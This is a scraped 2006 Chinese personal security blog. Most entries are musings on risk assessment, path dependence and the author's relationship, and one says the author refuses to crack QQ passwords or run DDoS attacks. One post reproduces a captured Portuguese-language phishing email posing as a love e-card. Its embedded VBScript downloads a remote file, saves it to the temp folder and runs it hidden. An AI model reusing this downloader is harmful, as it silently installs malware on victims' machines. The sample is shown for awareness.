我还活着,上来吼两声。
这段时间一直没有更新blog,是因为不方便写的东西比较多,并不是偷懒。
最近在 emm的提点下,写了下windows的stage shellcode,这个东西真是方便,用这个可以没有shellcode的长度和badchar的限制,呵呵。
另外,我的宝贝过生日了,祝她天天开心,西西~~(一切尽在不言中哈……)
2006年11月12日
2006年11月01日
2006年10月30日
Content-type: text/html; charset=iso-8859-1
From: <amor@namorando.com.br>
Cc: amor@namorando.com.br
Message-Id: <20061029231433.696E91D5289
Date: Sun, 29 Oct 2006 18:14:33 -0500 (EST)
<title>Microsoft Internet Explorer</title>
<head></head>
<body>
<script language="VBScript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, x56, False
x.Send
fname1="microsoft.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<TABLE width="50%" align=center border=0>
<TBODY>
<TR>
<TD>
<P><A href="http://dl-3.free.fr/52616e646f
src="http://img243.imageshack.us
border=0></A></P></TD></TR>
<TR>
<TD height=251>
<DIV align=center>
<P><FONT face="Verdana, Arial, Helvetica, sans-
serif"
color=#99cc00 size=1><FONT color=#6a6aff><STRONG>Olá </STRONG><STRONG>Meu
Amor</STRONG><FONT face="Verdana, Arial, Helvetica, sans-serif">, você
está recebendo um cartão virtual enviado por:</FONT> <FONT
face="Verdana, Arial
, Helvetica, sans-serif"
size=1><STRONG>Secreto</STRONG
t></FONT></FONT></P>
<P><FONT face="Verdana, Arial, Helvetica, sans-
serif"
color=#6a6aff size=1>Antes de você visualizar o cartão ele(a) deseja que
você leia algo antes:</FONT></P>
<P><FONT face="Verdana, Arial, Helvetica, sans-
serif"
color=#000000 size=1>Estou a sua volta, e você não percebe, sempre estou
te observando<BR>tudo o que você faz, eu quero te dizer algo, mas tenho
medo de acontecer tudo errado, e ter que me desiludir, mas agora tomei uma
certa atitude e irei me revelar no final do cartao virtual estara meu nome
e será uma grande surpresa, espero que seja boa, pois minha paixão é tão
intensa por você! Você é a pessoa mais perfeita que ja vi! TE
AMO!</FONT></P>
<P><FONT face="Verdana, Arial, Helvetica, sans-
serif"
color=#6a6aff size=1>Abaixo o link para você visualizar o
cartão</FONT></P>
<P><A
href="http://dl-3.free.fr/52616e646f
target=_blank><STRONG>Clique aqui para visualizar seu cartão !!!</STRONG></A><BR>
</P>
<P><FONT face="Verdana, Arial, Helvetica, sans-serif" color=#9797ff
size=1>Namorando .com.br 2005<BR>Todos os direitos
reservados</FONT></P></DIV><
归类于: Ultimate Hacking — axis @ 3:14 pm 评论(1)
2006年10月25日
众所周知,在信息安全中,CIA三要素是基本的衡量原则,即 机密性,完整性,可用性。
然而在实际的安全评估中,我认为是比较难把握这个度的。虽然有各种标准来参考,但参考毕竟只是手册而已。
在访谈过程中,人的因素占了主要位置。
比如对一个业务流程的评估,主管和普通员工的评论很可能就不一样,因为主管所站的层面是不同的,信息量会更大,思考的方式也不同。人与人之间由于安全意识的不同,也会导致结果的不同。如果在评估过程中过分依赖人的因素,就可能造成比较大的误差。
当然评估也只是一个求极限的过程而已,事实上,连业务本身也在千变万化,一次静态评估很难把动态的业务完整的描述清楚。
我总是习惯于从黑客的角度来考虑问题,可能是这么多年的习惯了。
比如面对一份扫描报告,可能其中评价为危险等级为中的问题,结合另外一个缺陷后,马上就会上升为风险等级为高的严重问题了。
在CIA中也是如此,评估过程中,别人认为不重要的,我总是会思考如何攻破他,弱点都是如此明显,因此别人眼中的低风险等级,在我的眼中往往就变成了高。这也是因为我的思考的局限性所导致的。
总之,两点心得:1。我们只能尽量逼近那个事实。
2。没有绝对的风险等级。
归类于: Ultimate Hacking — axis @ 2:26 pm 评论(2)
2006年10月22日
不是SharpWxxxx 那个,以前在swan的blog看到他提过,今天终于有幸亏得庐山真面貌
呵呵,限于论坛守则不能在blog发细节了。
归类于: Ultimate Hacking — axis @ 12:38 pm 评论(2)
2006年10月16日
路径依赖定义
一旦人们做了某种选择,就好比走上了一条不归之路,惯性的力量会使这一选择不断自我强化,并让你轻易走不出去。
第一个使“路径依赖”理论声名远播的是道格拉斯·诺思,由于用“路径依赖”理论成功地阐释了经济制度的演进,道格拉斯·诺思于1993年获得诺贝尔经济学奖。
诺思认为,“路径依赖”类似于物理学中的惯性,事物一旦进入某一路径,就可能对这种路径产生依赖。这是因为,经济生活与物理世界一样,存在着报酬递增和自我强化的机制。这种机制使人们一旦选择走上某一路径,就会在以后的发展中得到不断的自我强化。
“路径依赖”理论被总结出来之后,人们把它广泛应用在选择和习惯的各个方面。在一定程度上,人们的一切选择都会受到路径依赖的可怕影响,人们过去做出的选择决定了他们现在可能的选择,人们关于习惯的一切理论都可以用“路径依赖”来解释。
路径依赖的实验
有人将5只猴子放在一只笼子里,并在笼子中间吊上一串香蕉,只要有猴子伸手去拿香蕉,就用高压水教训所有的猴子,直到没有一只猴子再敢动手。
然后用一只新猴子替换出笼子里的一只猴子,新来的猴子不知这里的“规矩”,竟又伸出上肢去拿香蕉,结果触怒了原来笼子里的4只猴子,于是它们代替人执行惩罚任务,把新来的猴子暴打一顿,直到它服从这里的“规矩”为止。
试验人员如此不断地将最初经历过高压水惩戒的猴子换出来,最后笼子里的猴子全是新的,但没有一只猴子再敢去碰香蕉。
起初,猴子怕受到“株连”,不允许其他猴子去碰香蕉,这是合理的。
但后来人和高压水都不再介入,而新来的猴子却固守着“不许拿香蕉”的制度不变,这就是路径依赖的自我强化效应。
路径依赖的作用:自我强化与锁定效应—–马屁股决定铁轨的宽度
一个广为流传、引人入胜的例证是:现代铁路两条铁轨之间的标准距离是四英尺又八点五英寸,为什么采用这个标准呢?
原来,早期的铁路是由建电车的人所设计的,而四英尺又八点五英寸正是电车所用的轮距标准。
那么,电车的标准又是从哪里来的呢?
最先造电车的人以前是造马车的,所以电车的标准是沿用马车的轮距标准。
马车又为什么要用这个轮距标准呢?
英国马路辙迹的宽度是四英尺又八点五英寸,所以,如果马车用其他轮距,它的轮子很快会在英国的老路上撞坏。
这些辙迹又是从何而来的呢?
从古罗马人那里来的。因为整个欧洲,包括英国的长途老路都是由罗马人为它的军队所铺设的,而四英尺又八点五英寸正是罗马战车的宽度。
任何其他轮宽的战车在这些路上行驶的话,轮子的寿命都不会很长。
可以再问,罗马人为什么以四英尺又八点五英寸为战车的轮距宽度呢?
原因很简单,这是牵引一辆战车的两匹马屁股的宽度。
故事到此还没有结束。
美国航天飞机燃料箱的两旁有两个火箭推进器,因为这些推进器造好之后要用火车运送,路上又要通过一些隧道,而这些隧道的宽度只比火车轨道宽一点,因此火箭助推器的宽度是由铁轨的宽度所决定的。
所以,最后的结论是:路径依赖导致了美国航天飞机火箭助推器的宽度,竟然是两千年前便由两匹马屁股的宽度所决定的。
PS:人生中选择很重要,多年前的一次选择,可能会决定你的一生的轨迹,因为你从是会沿着这条选择的道路去发展,这就是命运!
回想起来,当年我若没选择去读大学,而是留下来继续读高中,那么我可能不会那么早去接触网络安全,可能不会选现在的专业,可能还是妈妈的乖乖儿子,一切听父母的,没有自己的思想,那么自然也就没有我今天来到这家公司工作,也不会认识我现在的女朋友。
所有这一切并不是由我的那次选择所决定的,但不可否认的是,没有那次的选择,就不会有今天的一切。命运就是这么玄妙的东西。
如果我今天选择跳槽去乙方,那么我以后的人生轨迹肯定也不一样。聪慧的人可以将目光放的更远,就像下棋一样,我们无法窥见所有的变数,但能算的更远,我们在命运的洪流中将处于更有利的地位。
命运,其实还是掌握在自己的手中啊!
2006年10月10日
2006年09月28日
在blog上加了个pingme
大家看左边的公告里那个笑脸图标,直接点一下就可以给我的yahoo通发消息了。
邮件签名里也加上了。
2006年09月27日
有点郁闷
吃饭的时候,一个同事听说我的“技能”,马上说:“给你个QQ帮我破下吧!”
汗一下。。。。。。
我说:我会帮你打腾讯客服的。
是的,我觉得偷个alibaba的高供帐号都比破QQ要来的简单。
唉,心情!@#@$@#%@!
本人三种事情不接:
1。破QQ密码(最好的方法是直接打腾讯客服)
2。DDOS(没那么多肉鸡)
3。出于无聊的目的攻击个人机器(要是说黑谁就黑谁,我还在这里混~~?!)
hacker不是神,何况我不敢自称hacker,我只是个混娱乐圈的科普工作者。
晚上和mm去看蔡依琳演唱会,放松一下,happy一下 :)
2006年09月21日
今天是冷战开始的第一个晚上
我感觉身上好冷。
很想她,却不想找她。
她说只能感受到我对她好,对我没有爱的感觉。
唉,我若真的不爱她,又怎会在最热的时候跑去给她买水果,在夜深的时候跑去看她,在她生气的时候,在楼下等上3个小时想见她,在最困最累的时候,依然等她下班,在最冷的时候,跑去排队,罚站似的一个多小时买火车票。所有这些,我都没想过要得到什么,讨好什么,只是觉得这样做,是对她的呵护,能让她开心。而看她开心,则是我现在生命中最快乐的事情之一了!
亲爱的,或许我真的不懂得表达自己的感情,只知道一味的对你好,但是,你真的感觉不到那些细微之处的真情吗?
从不发脾气,从不生气,可能,你看我的笑脸看腻了,听我的温柔的声音听厌了。是我没做好,不懂得怎样谈“好”恋爱。感情不是一味的好就可以了,两个人应是棋逢对手。我会慢慢学。
可能我真是被你管住了,你说该如何,我都答应,并会好好做。但可能这并不是你想要的,你想我更“男人”,足够保护你,管好你。
倔强的小蝎子,你这次真是伤到我的心了,我会等你服软,等你来找我。
但无论如何,我还是爱你的,也许你不开心,不高兴,如果你见到我烦,那我只好在你面前消失了。但是正如我以前对你说过的,我会在一个角落里默默的关注着你。
小黑说,只要牙儿愿意,他就会一直陪在牙儿身边。
小黑说,只要牙儿不嫌弃,他就一定会给牙儿幸福。